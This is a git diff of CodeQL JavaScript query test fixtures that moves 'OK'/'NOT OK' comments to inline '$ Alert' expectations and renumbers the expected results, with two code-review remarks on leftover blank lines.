diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected @@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref index e47f1e1bb452..4ae72160a8d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.qlref @@ -1 +1,2 @@ -AngularJS/UnusedAngularDependency.ql \ No newline at end of file +query: AngularJS/UnusedAngularDependency.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js 
@@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected 
@@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref index f746d68ee039..0d148711d808 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.qlref @@ -1 +1,2 @@ -AngularJS/UseNgSrc.ql +query: AngularJS/UseNgSrc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..943b7d1ccd7d 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html @@ -4,13 +4,12 @@ - - Help + Help - - + + - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html 
+++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
- - Help + Help
diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref index b9796d5fe875..514a8413531d 100644 --- a/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref +++ b/javascript/ql/test/query-tests/Comments/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1 @@ -Comments/CommentedOutCode.ql +query: Comments/CommentedOutCode.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref index 1a8a4a57b6d4..3fad05c4f256 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref +++ b/javascript/ql/test/query-tests/Comments/TodoComments/TodoComments.qlref @@ -1 +1 @@ -Comments/TodoComments.ql +query: Comments/TodoComments.ql diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref index a7f743a3788e..cd82a95525cc 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref +++ b/javascript/ql/test/query-tests/DOM/Alert/Alert.qlref 
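Review bot: In `Comments/TodoComments/tst.js` the `// OK` marker is swapped for an empty line, so nothing states any more why the remaining comment (`... version=XXX`) must stay unflagged. `TodoComments.qlref` in this same commit gets only the `query:` line and no `postprocess:` entry, so no inline expectation takes over that role. Presumably the case pins that a placeholder value after `=` is not treated as a marker; if so, keep a first line such as `// OK - placeholder value after '=', not a marker` instead of the blank one.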
@@ -1 +1,2 @@ -DOM/Alert.ql +query: DOM/Alert.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..bee7199e45f8 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:16:22:16:33 | id="theDiff" | This element has the same id as $@. | tst.js:16:46:16:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html index 98a490ec408a..3cd7b57ed393 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.html @@ -1,7 +1,7 @@ 
diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref
index 7dfdfdde152a..a0e49e6dd91c 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref
+++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.qlref
@@ -1 +1,2 @@
-DOM/AmbiguousIdAttribute.ql
+query: DOM/AmbiguousIdAttribute.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html
index bb5969c1f79e..9b0f0a8eb7ee 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html
+++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttributeGood.html
@@ -5,8 +5,8 @@
  • Second element
  • Templated id
  • Templated id
  • -
  • Invalid id
  • -
  • Invalid id
  • +
  • Invalid id
  • +
  • Invalid id
  • duplicate-class
  • duplicate-class
  • diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html index 2d5e014268c0..d96d9a670756 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute_fragment.html @@ -1,4 +1,4 @@ diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected @@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html index 92af95c3e3c1..9c1d31c1427d 100644 
--- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.html @@ -1 +1 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref index 7022b813c939..678090c3e81b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.qlref @@ -1 +1,2 @@ -DOM/ConflictingAttributes.ql +query: DOM/ConflictingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..02866a675677 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected @@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:18:17:18:28 | id="theDiff" | This attribute $@. | tst.js:18:30:18:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html index 4155ef623419..95a34ce55fd1 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.html 
@@ -1,3 +1,3 @@ -Semmle +Semmle diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref index 1ce0181329f1..9066faa039ff 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.qlref @@ -1 +1,2 @@ -DOM/DuplicateAttributes.ql +query: DOM/DuplicateAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html index 9da8fcde5022..45d14ac5bb70 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.html 
@@ -1 +1 @@ -
    An important heading
    +
    An important heading
    diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref index 8665e0ad7b85..04f910af31b9 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.qlref @@ -1 +1,2 @@ -DOM/MalformedIdAttribute.ql +query: DOM/MalformedIdAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..04f9ee0bd554 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,18 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
    ; var div2 =
    ; -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// not OK -Semmle; +Semmle; // $ Alert[js/duplicate-html-attribute] -// not OK -
    ; -
    ; +
    ; // $ Alert[js/malformed-html-id] +
    ; // $ Alert[js/malformed-html-id] -// not OK -Semmle; +Semmle; // $ Alert[js/conflicting-html-attribute] -// OK
    ; -// not OK -var div3 =
    ; +var div3 =
    ; // $ Alert[js/duplicate-html-id] -// not OK -var div4 =
    ; +var div4 =
    ; // $ Alert[js/duplicate-html-attribute] diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref index 4d773c9c35d7..51a532f97916 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/PseudoEval.qlref @@ -1 +1,2 @@ -DOM/PseudoEval.ql \ No newline at end of file +query: DOM/PseudoEval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js index 52030b2e2584..18f3828a15e2 100644 --- a/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js +++ b/javascript/ql/test/query-tests/DOM/PseudoEval/tst.js @@ -1,10 +1,10 @@ -window.setTimeout(";"); -setInterval("update();"); +window.setTimeout(";"); // $ Alert +setInterval("update();"); // $ Alert setInterval(update); -document.write("alert('Hi!');"); -window.execScript("debugger;"); +document.write("alert('Hi!');"); // $ Alert +window.execScript("debugger;"); // $ Alert (function(global) { var document = global.document; - document.write("undefined = 2"); + document.write("undefined = 2"); // $ Alert })(this); diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..d9842e5c53c0 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected 
@@ -1,9 +1,9 @@ | tst.html:23:1:23:61 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | +| tst.html:25:1:25:54 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:16:1:16:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:29:12:29:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:36:12:36:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref index d02f1866b82d..3f4f724c916c 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.qlref 
@@ -1 +1,2 @@ -DOM/TargetBlank.ql +query: DOM/TargetBlank.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html index 78c104bcaa1e..53d0df2000d9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.html @@ -20,14 +20,14 @@

    OK, because of constant prefix

    Example

    NOT OK, because of dynamic URL

    -Example -Example - +Example +Example + Example

    NOT OK: mailto is not fine.

    -mail somone +mail somone

    OK: template elements after # or ? are fine.

    Example diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..7f3f7c9fc537 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,6 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK Example; Example; Example; @@ -9,42 +8,37 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; -Example; -Example; +Example; // $ Alert - because of dynamic URL +Example; // $ Alert +Example; // $ Alert function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +46,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example 
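Review bot: In `DOM/TargetBlank/tst.js` the `// OK` directly after `function f() {` is replaced by an added empty line, while the other `// OK` and `// NOT OK` lines in the same hunk are deleted outright, so the function body now opens with a stray blank line. The same substitution shows up in `Declarations/AssignmentToConst/tst.js` (before `z = 72;` and `const s = "hi";`) and `Declarations/ClobberingVarInit/tst.js` (before `var tmp` and `var a, b`). The `.expected` files for these tests are renumbered in this commit anyway, so the padding does not keep any line numbers stable; dropping those lines would leave the fixtures consistent. Whether the added lines also carry trailing whitespace cannot be told from this rendering.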
diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref index e48959a692ac..b955dfe9e83b 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/ArgumentsRedefined.qlref @@ -1 +1,2 @@ -Declarations/ArgumentsRedefined.ql +query: Declarations/ArgumentsRedefined.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..1aceac8eeb0d 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,13 +1,13 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ - for ([arguments] of o); - for ([arguments = 4] of o); + for ([arguments] of o); // $ Alert + for ([arguments = 4] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; 
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
index b74841153cb3..7e457d64b08e 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
@@ -1,7 +1,7 @@
-| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared |
-| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared |
-| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
-| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
-| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
-| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
-| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared |
+| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared |
+| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared |
+| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
+| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
+| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
+| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared |
+| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared |
